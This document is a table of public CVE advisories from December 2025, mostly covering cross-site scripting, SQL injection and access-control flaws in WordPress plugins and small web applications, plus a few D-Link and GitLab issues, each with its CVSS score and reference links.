| looks_awesome--Flow-Flow Social Feed Stream | The Flow-Flow Social Feed Stream plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the flow_flow_social_auth AJAX action in versions 3.0.0 to 4.7.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to modify plugin settings and store arbitrary JavaScript that executes whenever the plugin settings page is viewed. | 2025-12-12 | 6.4 | CVE-2025-13866 | https://www.wordfence.com/threat-intel/vulnerabilities/id/065d01b6-30e0-4bc8-bd70-25996c2df879?source=cve https://plugins.trac.wordpress.org/browser/flow-flow-social-streams/trunk/includes/db/FFDBManager.php#L24 https://plugins.trac.wordpress.org/browser/flow-flow-social-streams/trunk/includes/FlowFlowActivator.php#L224 |
| buntegiraffe--Hide Email Address | The Hide Email Address plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'inline_css' parameter in the `bg-hide-email-address` shortcode in all versions up to, and including, 0.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13884 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a770ab37-127a-4018-9ffa-1b326d5a016e?source=cve https://plugins.trac.wordpress.org/browser/bg-hide-email-address/trunk/BgHideEmailAddress.php#L101 https://plugins.trac.wordpress.org/browser/bg-hide-email-address/tags/0.1/BgHideEmailAddress.php#L101 |
| imran3229--Zenost Shortcodes | The Zenost Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'link' and 'target' parameters in the `button` shortcode in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13885 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c88d378a-6c58-4670-b0b6-0e0d51c39bd1?source=cve https://plugins.trac.wordpress.org/browser/zenost-shortcodes/trunk/inc/shortcodes.php#L25 https://plugins.trac.wordpress.org/browser/zenost-shortcodes/tags/1.0/inc/shortcodes.php#L25 |
| tmus--Simple Nivo Slider | The Simple Nivo Slider plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'id' shortcode parameter in all versions up to, and including, 0.5.6 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13889 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0c1c343c-ef16-4468-a983-0dc9fd152dd5?source=cve https://plugins.trac.wordpress.org/browser/simple-nivo-slider/tags/0.5.6/simple-nivo-slider.php#L208 https://plugins.trac.wordpress.org/browser/simple-nivo-slider/trunk/simple-nivo-slider.php#L208 |
| wpchill--Image Gallery Photo Grid & Video Gallery | The Image Gallery - Photo Grid & Video Gallery plugin for WordPress is vulnerable to Path Traversal in all versions up to, and including, 2.13.3. This is due to the modula_list_folders AJAX endpoint that lacks proper path validation and base directory restrictions. While the endpoint verifies user capabilities (Author+ with upload_files and edit_posts permissions), it fails to validate that user-supplied directory paths reside within safe directories. This makes it possible for authenticated attackers, with Author-level access and above, to enumerate arbitrary directories on the server via the modula_list_folders endpoint. | 2025-12-12 | 6.5 | CVE-2025-13891 | https://www.wordfence.com/threat-intel/vulnerabilities/id/71e587ec-ceb6-48ca-9a1a-599d9d988b4d?source=cve https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L230 https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L160 https://plugins.trac.wordpress.org/browser/modula-best-grid-gallery/tags/2.12.26/includes/admin/class-modula-gallery-upload.php#L411 https://research.cleantalk.org/cve-2025-13891/ https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3414176%40modula-best-grid-gallery%2Ftrunk&old=3407949%40modula-best-grid-gallery%2Ftrunk&sfp_email=&sfph_mail= |
| lesion--WPGancio | The WPGancio plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gancio-event' shortcode in all versions up to, and including, 1.12 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13904 | https://www.wordfence.com/threat-intel/vulnerabilities/id/593fefe1-8813-440b-b8c7-fbfd5b71a737?source=cve https://plugins.trac.wordpress.org/browser/wpgancio/trunk/wc.php#L33 https://plugins.trac.wordpress.org/browser/wpgancio/tags/1.12/wc.php#L33 |
| ysh--WP Flot | The WP Flot plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'linechart' shortcode in all versions up to, and including, 0.2.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13906 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b4905ca1-3096-45c5-838b-1237888fb969?source=cve https://plugins.trac.wordpress.org/browser/wp-flot/trunk/wpflot.php#L101 https://plugins.trac.wordpress.org/browser/wp-flot/tags/0.2.2/wpflot.php#L101 |
| davidkeen--GPXpress | The GPXpress plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'gpxpress' shortcode in all versions up to, and including, 1.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13960 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a2bf5c47-11e6-462d-a671-3f5e94e9e7e5?source=cve https://plugins.trac.wordpress.org/browser/gpxpress/trunk/includes/Gpxpress.php#L152 https://plugins.trac.wordpress.org/browser/gpxpress/tags/1.3/includes/Gpxpress.php#L152 |
| subhransu-sekhar--Data Visualizer | The Data Visualizer plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'visualize' shortcode in all versions up to, and including, 1.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13961 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac7aeb6a-4e41-4301-8e79-ffe1468c0940?source=cve https://plugins.trac.wordpress.org/browser/data-visualizer/trunk/data-visualizer.php#L92 https://plugins.trac.wordpress.org/browser/data-visualizer/tags/1.1/data-visualizer.php#L92 |
| klemmkeil--Divelogs Widget | The Divelogs Widget plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'latestdive' shortcode in all versions up to, and including, 1.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13962 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cbb3378a-d3e8-4a31-9ed2-f580960878cf?source=cve https://plugins.trac.wordpress.org/browser/divelogs-widget/trunk/divelogs-widget.php#L51 https://plugins.trac.wordpress.org/browser/divelogs-widget/tags/1.5/divelogs-widget.php#L51 https://plugins.trac.wordpress.org/changeset/3415821/ |
| falselight--FX Currency Converter | The FX Currency Converter plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'fxcc_convert' shortcode in all versions up to, and including, 0.2.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13963 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d01a7887-afd7-418b-99ad-92157582a506?source=cve https://plugins.trac.wordpress.org/browser/fx-currency-converter/trunk/includes/shortcode.php#L57 https://plugins.trac.wordpress.org/browser/fx-currency-converter/tags/0.2.0/includes/shortcode.php#L57 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3415819%40fx-currency-converter&new=3415819%40fx-currency-converter&sfp_email=&sfph_mail= |
| sonlamtn200--Paypal Payment Shortcode | The Paypal Payment Shortcode plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'buttom_image' parameter of the [paypal-shortcode] shortcode in all versions up to, and including, 1.01 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13966 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b0b1fbb1-fc2c-4eb9-89c6-364ca8c385db?source=cve https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/trunk/sls-paypal-payments-shortcode.php#L10 https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/tags/1.01/sls-paypal-payments-shortcode.php#L10 https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/trunk/sls-paypal-payments-shortcode.php#L55 https://plugins.trac.wordpress.org/browser/paypal-payments-shortcode/tags/1.01/sls-paypal-payments-shortcode.php#L55 |
| eurisko--Reviews Sorted | The Reviews Sorted plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'space' parameter of the [reviews-slider] shortcode in all versions up to, and including, 2.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13969 | https://www.wordfence.com/threat-intel/vulnerabilities/id/74e790e7-60fd-45cd-942f-0f24365d7fc8?source=cve https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/functions/do.php#L138 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/functions/do.php#L138 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider-1.php#L30 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider-1.php#L30 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider-2.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider-2.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/trunk/templates/reviews-slider-3.php#L23 https://plugins.trac.wordpress.org/browser/reviews-sorted/tags/2.4.2/templates/reviews-slider-3.php#L23 |
| thobian-- | The 评论小秘书 plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.3.2. This is due to insufficient input sanitization and output escaping on the `$_SERVER['PHP_SELF']` variable in the plugin's settings page. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-13988 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b24506c2-bf5e-4c71-94a5-c557a09f9f0d?source=cve https://plugins.trac.wordpress.org/browser/comments-secretary/trunk/tho_fetion.php#L173 https://plugins.trac.wordpress.org/browser/comments-secretary/tags/1.3.2/tho_fetion.php#L173 |
| nazsabuz--WP Dropzone | The WP Dropzone plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'callback' shortcode attribute in all versions up to, and including, 1.1.1. This is due to insufficient input sanitization and output escaping on user-supplied 'callback' attributes, which are evaluated as JavaScript code via the `new Function()` constructor. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-13989 | https://www.wordfence.com/threat-intel/vulnerabilities/id/23953909-4836-4226-b00b-eb0e24cc3ad7?source=cve https://plugins.trac.wordpress.org/browser/wp-dropzone/trunk/includes/class-plugin.php#L303 https://plugins.trac.wordpress.org/browser/wp-dropzone/trunk/js/wp-dropzone.js#L86 https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.1/includes/class-plugin.php#L303 https://plugins.trac.wordpress.org/browser/wp-dropzone/tags/1.1.1/js/wp-dropzone.js#L86 |
| soportecibeles--AI Feeds | The AI Feeds plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'aife_post_meta' shortcode in all versions up to, and including, 1.0.22 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14030 | https://www.wordfence.com/threat-intel/vulnerabilities/id/d33721e2-0a90-4102-84d5-2633c0fd47ed?source=cve https://plugins.trac.wordpress.org/browser/ai-feeds/trunk/includes/functions.php#L58 https://plugins.trac.wordpress.org/browser/ai-feeds/tags/1.0.12/includes/functions.php#L58 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3417124%40ai-feeds&new=3417124%40ai-feeds&sfp_email=&sfph_mail= |
| boldthemes--Bold Timeline Lite | The Bold Timeline Lite plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'title' parameter in the 'bold_timeline_group' shortcode in all versions up to, and including, 1.2.7 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14032 | https://www.wordfence.com/threat-intel/vulnerabilities/id/840fd950-3ce3-4068-b8bc-270f168a5091?source=cve https://wordpress.org/plugins/bold-timeline-lite https://plugins.trac.wordpress.org/browser/bold-timeline-lite/trunk/assets/views/bold_timeline_group_view.php#L79 https://plugins.trac.wordpress.org/browser/bold-timeline-lite/tags/1.2.7/assets/views/bold_timeline_group_view.php#L79 |
| e4jvikwp--VikRentItems Flexible Rental Management System | The VikRentItems Flexible Rental Management System plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'delto' parameter in all versions up to, and including, 1.2.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14049 | https://www.wordfence.com/threat-intel/vulnerabilities/id/51b56dc5-0d2d-4fa9-872c-4193f61c165f?source=cve https://plugins.trac.wordpress.org/browser/vikrentitems/trunk/site/views/deliverymap/tmpl/default.php#L277 https://plugins.trac.wordpress.org/browser/vikrentitems/tags/1.2.0/site/views/deliverymap/tmpl/default.php#L277 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3414595%40vikrentitems&new=3414595%40vikrentitems&sfp_email=&sfph_mail= |
| cytechltd--BuddyTask | The BuddyTask plugin for WordPress is vulnerable to unauthorized access and modification of data due to a missing capability check on multiple AJAX endpoints in all versions up to, and including, 1.3.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to view, create, modify, and delete task boards belonging to any BuddyPress group, including private and hidden groups they are not members of. | 2025-12-12 | 6.5 | CVE-2025-14064 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0dfe0947-5790-49ba-aa3d-6bc61c12b355?source=cve https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L458 https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L666 https://cwe.mitre.org/data/definitions/862.html https://plugins.trac.wordpress.org/browser/buddytask/tags/1.3.0/buddytask.php#L458 https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L763 https://plugins.trac.wordpress.org/browser/buddytask/trunk/buddytask.php#L840 https://plugins.trac.wordpress.org/changeset/3416754/ |
| themebon--App Landing Template Blocks for WPBakery (Visual Composer) Page Builder | The App Landing Template Blocks for WPBakery (Visual Composer) Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'atvc_video_play' shortcode in all versions up to, and including, 2.0.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14119 | https://www.wordfence.com/threat-intel/vulnerabilities/id/5c440ae0-311d-4d0a-a216-7641c2a80669?source=cve https://plugins.trac.wordpress.org/browser/app-template-blocks-for-wpbakery-page-builder/trunk/modules/video-play.php#L58 https://plugins.trac.wordpress.org/browser/app-template-blocks-for-wpbakery-page-builder/tags/2.0.2/modules/video-play.php#L58 |
| andru1--Complag | The Complag plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14125 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1bdae07c-cb80-4566-9b90-7b144c6ceeb0?source=cve https://plugins.trac.wordpress.org/browser/omplag/trunk/complag.php#L37 https://plugins.trac.wordpress.org/browser/omplag/tags/1.0.2/complag.php#L37 |
| wasiul99--Like DisLike Voting | The Like DisLike Voting plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.1 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14129 | https://www.wordfence.com/threat-intel/vulnerabilities/id/25dfa483-26c6-43d1-9a24-9ea245b54f4c?source=cve https://wordpress.org/plugins/like-dislike-voting/ https://plugins.trac.wordpress.org/browser/like-dislike-voting/trunk/files/function.php#L76 https://plugins.trac.wordpress.org/browser/like-dislike-voting/tags/1.0.1/files/function.php#L76 |
| pandikamal03--Category Dropdown List | The Category Dropdown List plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14132 | https://www.wordfence.com/threat-intel/vulnerabilities/id/baac847b-3c5e-44c4-bccf-fcbde1adf37f?source=cve https://plugins.trac.wordpress.org/browser/dropdown-category-list/trunk/settings.php#L11 https://plugins.trac.wordpress.org/browser/dropdown-category-list/tags/1.0/settings.php#L11 |
| alexdtn--Simple AL Slider | The Simple AL Slider plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.2.10 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14137 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e12e2ba1-fc4f-4ad0-80da-3504ef1e13d3?source=cve https://wordpress.org/plugins/simple-al-slider/ https://plugins.trac.wordpress.org/browser/simple-al-slider/trunk/templates/admin/header.tpl#L46 https://plugins.trac.wordpress.org/browser/simple-al-slider/tags/1.2.10/templates/admin/header.tpl#L46 |
| wpletsgo--WPLG Default Mail From | The WPLG Default Mail From plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the `$_SERVER['PHP_SELF']` variable in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2025-12-12 | 6.1 | CVE-2025-14138 | https://www.wordfence.com/threat-intel/vulnerabilities/id/fd24b087-83a7-4f9a-8f7a-1bd94332c1f7?source=cve https://plugins.trac.wordpress.org/browser/wplg-default-mail-from/trunk/wplg.php#L134 https://plugins.trac.wordpress.org/browser/wplg-default-mail-from/tags/1.0.0/wplg.php#L134 |
| ayothemes--Ayo Shortcodes | The Ayo Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'color' parameter of the ayo_action shortcode in all versions up to, and including, 0.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-12 | 6.4 | CVE-2025-14143 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1760fe6e-8153-4479-ae32-2e2f0fa54e12?source=cve https://plugins.trac.wordpress.org/browser/ayo-shortcodes/trunk/includes/ayo-shortcodes-functions.php#L66 https://plugins.trac.wordpress.org/browser/ayo-shortcodes/trunk/includes/ayo-shortcodes-functions.php#L55 https://plugins.trac.wordpress.org/browser/ayo-shortcodes/tags/0.2/includes/ayo-shortcodes-functions.php#L55 https://plugins.trac.wordpress.org/browser/ayo-shortcodes/tags/0.2/includes/ayo-shortcodes-functions.php#L66 |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 6.3 before 18.4.6, 18.5 before 18.5.4, and 18.6 before 18.6.2 that could have allowed an authenticated user to cause a Denial of Service condition by sending crafted API calls with large content parameters. | 2025-12-11 | 6.5 | CVE-2025-14157 | GitLab Issue #574324 https://about.gitlab.com/releases/2025/12/10/patch-release-gitlab-18-6-2-released/ |
| SourceCodester--Online Student Clearance System | A vulnerability was determined in SourceCodester Online Student Clearance System 1.0. The affected element is an unknown function of the file /Admin/delete-fee.php of the component Fee Table Handler. Executing manipulation of the argument ID can lead to improper authorization. The attack may be performed from remote. The exploit has been publicly disclosed and may be utilized. | 2025-12-08 | 6.5 | CVE-2025-14206 | VDB-334649 | SourceCodester Online Student Clearance System Fee Table delete-fee.php improper authorization VDB-334649 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700465 | Sourcecodester Online Student Clearance System Project 1.0 /Admin/delete-fee.php Broken Access Control https://github.com/rassec2/dbcve/issues/8 https://www.sourcecodester.com/ |
| D-Link--DIR-823X | A security flaw has been discovered in D-Link DIR-823X up to 20250416. This affects the function sub_415028 of the file /goform/set_wan_settings. The manipulation of the argument ppp_username results in command injection. It is possible to launch the attack remotely. The exploit has been released to the public and may be exploited. | 2025-12-08 | 6.3 | CVE-2025-14208 | VDB-334651 | D-Link DIR-823X set_wan_settings sub_415028 command injection VDB-334651 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700499 | D-Link DIR-823X 250416 Command Injection https://github.com/panda666-888/vuls/blob/main/d-link/dir-823x/set_wan_settings.md https://github.com/panda666-888/vuls/blob/main/d-link/dir-823x/set_wan_settings.md#poc https://www.dlink.com/ |
| itsourcecode--Student Information System | A vulnerability has been found in itsourcecode Student Information System 1.0. This affects an unknown part of the file /section_edit1.php. The manipulation of the argument ID leads to sql injection. Remote exploitation of the attack is possible. The exploit has been disclosed to the public and may be used. | 2025-12-08 | 6.3 | CVE-2025-14214 | VDB-334656 | itsourcecode Student Information System section_edit1.php sql injection VDB-334656 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #700986 | itsourcecode Student Information System V1.0 SQL Injection Submit #700987 | itsourcecode Student Information System V1.0 SQL Injection (Duplicate) https://github.com/ltranquility/CVE/issues/15 https://itsourcecode.com/ |
| code-projects--Employee Profile Management System | A flaw has been found in code-projects Employee Profile Management System 1.0. Affected is an unknown function of the file /print_personnel_report.php. This manipulation of the argument per_id causes sql injection. The attack may be initiated remotely. The exploit has been published and may be used. | 2025-12-08 | 6.3 | CVE-2025-14222 | VDB-334664 | code-projects Employee Profile Management System print_personnel_report.php sql injection VDB-334664 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701636 | code-projects Employee Profile Management System Project V1 print_personnel_report.php SQL injection V1 SQL Injection https://github.com/tiancesec/CVE/issues/14 https://code-projects.org/ |
| D-Link--DCS-930L | A vulnerability was determined in D-Link DCS-930L 1.15.04. This affects an unknown part of the file /setSystemAdmin of the component alphapd. Executing manipulation of the argument AdminID can lead to command injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. This vulnerability only affects products that are no longer supported by the maintainer. | 2025-12-08 | 6.3 | CVE-2025-14225 | VDB-334667 | D-Link DCS-930L alphapd setSystemAdmin command injection VDB-334667 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701774 | D-Link DCS930L v1.15.04 Command Injection https://github.com/Madgeaaaaa/MY_VULN_2/blob/main/D-Link/vuln-1/D-Link%20Vulnerability.md https://www.dlink.com/ |
| Philipinho--Simple-PHP-Blog | A security flaw has been discovered in Philipinho Simple-PHP-Blog up to 94b5d3e57308bce5dfbc44c3edafa9811893d958. This issue affects some unknown processing of the file /edit.php. The manipulation results in sql injection. The attack may be performed from remote. The exploit has been released to the public and may be exploited. This product utilizes a rolling release system for continuous delivery, and as such, version information for affected or updated releases is not disclosed. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 6.3 | CVE-2025-14227 | VDB-334669 | Philipinho Simple-PHP-Blog edit.php sql injection VDB-334669 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #701826 | Philip Okugbe Simple-PHP-Blog v1.0 SQL Injection https://github.com/woshinenbaba/CVE-/issues/1 |
| code-projects--Daily Time Recording System | A vulnerability was detected in code-projects Daily Time Recording System 4.5.0. The impacted element is an unknown function of the file /admin/add_payroll.php. Performing manipulation of the argument detail_Id results in sql injection. The attack can be initiated remotely. The exploit is now public and may be used. | 2025-12-08 | 6.3 | CVE-2025-14230 | VDB-334672 | code-projects Daily Time Recording System add_payroll.php sql injection VDB-334672 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702426 | code projects Daily Time Recording System V4.5.0 SQL Injection https://github.com/woshilaiyi/cve/issues/6 https://code-projects.org/ |
| code-projects--Simple Shopping Cart | A vulnerability was found in code-projects Simple Shopping Cart 1.0. This vulnerability affects unknown code of the file /Customers/settings.php. Performing manipulation of the argument user_id results in sql injection. Remote exploitation of the attack is possible. The exploit has been made public and could be used. | 2025-12-08 | 6.3 | CVE-2025-14246 | VDB-334756 | code-projects Simple Shopping Cart settings.php sql injection VDB-334756 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702461 | code-projects Simple Shopping Cart V1.0 SQL injection https://github.com/zzb1388/cve/issues/90 https://code-projects.org/ |
| code-projects--Simple Shopping Cart | A vulnerability was determined in code-projects Simple Shopping Cart 1.0. This issue affects some unknown processing of the file /Admin/additems.php. Executing manipulation of the argument item_name can lead to sql injection. The attack can be executed remotely. The exploit has been publicly disclosed and may be utilized. | 2025-12-08 | 6.3 | CVE-2025-14247 | VDB-334757 | code-projects Simple Shopping Cart additems.php sql injection VDB-334757 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702463 | code-projects Simple Shopping Cart V1.0 SQL injection https://github.com/zzb1388/cve/issues/91 https://code-projects.org/ |
| Galaxy Software Services--Vitals ESP | Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-12-08 | 6.5 | CVE-2025-14254 | https://www.twcert.org.tw/tw/cp-132-10542-4c682-1.html https://www.twcert.org.tw/en/cp-139-10543-380bd-2.html |
| Galaxy Software Services--Vitals ESP | Vitals ESP developed by Galaxy Software Services has a SQL Injection vulnerability, allowing authenticated remote attackers to inject arbitrary SQL commands to read database contents. | 2025-12-08 | 6.5 | CVE-2025-14255 | https://www.twcert.org.tw/tw/cp-132-10542-4c682-1.html https://www.twcert.org.tw/en/cp-139-10543-380bd-2.html |
| Jihai--Jshop MiniProgram Mall System | A vulnerability was found in Jihai Jshop MiniProgram Mall System 2.9.0. Affected by this issue is some unknown functionality of the file /index.php/api.html. The manipulation of the argument cat_id results in sql injection. The attack may be launched remotely. The exploit has been made public and could be used. The vendor was contacted early about this disclosure but did not respond in any way. | 2025-12-08 | 6.3 | CVE-2025-14259 | VDB-334765 | Jihai Jshop MiniProgram Mall System api.html sql injection VDB-334765 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #702613 | https://www.jihainet.com Jshop MiniProgram Mall System V2.9.0 SQL Injection http://101.200.76.102:38765/qwertyuiop/qwsdfvbnm/1/vuldb/Jshop/Jshop.html |
| htplugins--HT Slider For Elementor | The HT Slider for Elementor plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'slide_title' parameter in all versions up to, and including, 1.7.4 due to insufficient input sanitization and output escaping in JavaScript. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2025-12-13 | 6.4 | CVE-2025-14278 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af580e5a-a9da-4516-b612-b544dc73cf23?source=cve https://plugins.trac.wordpress.org/browser/ht-slider-for-elementor/tags/1.7.4/assets/js/htslider-widgets.js#L223 https://plugins.trac.wordpress.org/browser/ht-slider-for-elementor/tags/1.7.4/include/addons/htslider_scroll_navigation.php#L1397 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3415988%40ht-slider-for-elementor&new=3415988%40ht-slider-for-elementor#file1 |
